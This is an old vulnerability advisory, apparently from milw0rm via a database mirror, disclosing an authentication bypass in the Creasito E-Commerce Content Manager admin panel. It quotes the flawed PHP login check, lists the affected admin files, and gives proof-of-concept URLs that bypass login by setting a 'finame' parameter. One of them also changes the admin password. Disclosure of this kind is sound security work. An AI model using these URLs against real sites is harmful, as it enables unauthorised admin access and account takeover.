Creasito E-Commerce Content Manager (admin) Authentication Bypass

🗓️ 03 Nov 2006 00:00:00Reported by RootType

Creasito E-Commerce admin Authentication Bypass in <= 1.3.0


                                                                                             
============================================================================================

Creasito E-Commerce Content Manager (admin) Authentication Bypass

============================================================================================

Product............: Creasito E-Commerce Content Manager
Affected versions..: Creasito &lt;= 1.3.08
Security Risk......: High
Vendor.............: G. Fabozzi (http://creasito.bloghosteria.com/)
Product Link.......: http://prdownloads.sourceforge.net/creasito/creasito1.3.08.zip?download
Discovered by......: SlimTim10


Details:
---------
Files in the /admin directory use a very poor security method for authentication that is
simple to bypass.

Vulnerable Code:
-----------------
if ( empty( $finame ) ) {
?&gt; Prego effettuare il login &lt;a href=&quot;index.php&quot;&gt; Qui&lt;br&gt;
&amp;copy;Bloghosteria.com&lt;br&gt;
&lt;/a&gt;

Vulnerable Files:
------------------
(in /admin)
addnewcont.php, adminpassw.php, amministrazione.php, artins.php, bgcolor.php,
cancartcat.php, canccat.php, cancelart.php, cancontsit.php, chanpassamm.php, dele.php,
delecat.php, delecont.php, emailall.php, gestflashtempl.php, gestmagart.php, gestmagaz.php,
gestpre.php, input.php, input3.php, insnucat.php, instempflash.php, mailfc.php,
modfdati.php, rescont4.php, ricordo1.php, ricordo4.php, tabcatalg.php, tabcont.php,
tabcont3.php, tabstile.php, tabstile3.php, testimmg.php, update.php

Proof of Concept:
------------------

http://[host]/admin/amministrazione.php?finame=1
http://[host]/admin/admin/dele.php?finame=1
http://[host]/admin/chanpassamm.php?finame=1&amp;password=testing&amp;passver=testing *
* Changes the password as well as bypassing authentication


Solution:
----------
Use a better authentication method, like cookies!

================================================================

Shoutz: PCD, dw0rek, Tainted, str0ke!
SlimTim10 &lt;slimtim10[at]gmail[dot]com&gt;

================================================================

# milw0rm.com [2006-11-03]

03 Nov 2006 00:00Current

7.1High risk

Vulners AI Score7.1